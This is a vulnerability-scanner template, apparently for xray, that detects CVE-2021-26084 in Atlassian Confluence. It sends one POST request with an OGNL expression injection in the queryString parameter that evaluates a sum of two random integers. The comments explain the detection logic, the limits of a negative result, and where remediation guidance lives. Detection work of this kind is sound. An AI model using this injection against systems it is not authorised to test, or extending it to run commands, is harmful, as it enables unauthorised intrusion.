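# Scanner check for CVE-2021-26084 in Atlassian Confluence. The vendor
# advisory under detail.links is the reference for affected and fixed
# releases.
#
# How the check decides: it submits an arithmetic expression built from two
# random integers and reports a match only when the response contains their
# sum. The sum is never sent literally in the request, so a page that merely
# reflects the submitted parameter does not satisfy the expression.
name: poc-yaml-confluence-cve-2021-26084
set:
  # Two fresh six-digit operands per run keep the expected marker
  # unpredictable, which makes an accidental match on static page content
  # unlikely.
  r1: randomInt(100000, 999999)
  r2: randomInt(100000, 999999)
rules:
  # Single request. No headers or cookies are defined in this rule, so no
  # credentials are supplied from this file.
  - method: POST
    path: /pages/createpage-entervariables.action?SpaceKey=x
    # Literal block scalar: per YAML rules the value keeps one trailing
    # newline. The parameter embeds {r1+r2} between unicode-escaped quotes;
    # the payload is arithmetic only.
    body: |
      queryString=\u0027%2b%7b{{r1}}%2B{{r2}}%7d%2b\u0027
    # Both conditions must hold: HTTP 200 and the decimal sum present in the
    # body. NOTE(review): an instance that answers with another status (for
    # example behind a redirecting proxy or a filtering WAF) is reported as
    # not matching, so a negative result is not proof that the host is
    # patched -- confirm the installed release against the advisory.
    expression: |
      response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
detail:
  author: Loneyer(https://github.com/Loneyers)
  links:
    # Remediation guidance lives here. On a match, also review web access
    # logs for earlier POSTs to the path above, since a hit shows the
    # endpoint was evaluating submitted expressions.
    - https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html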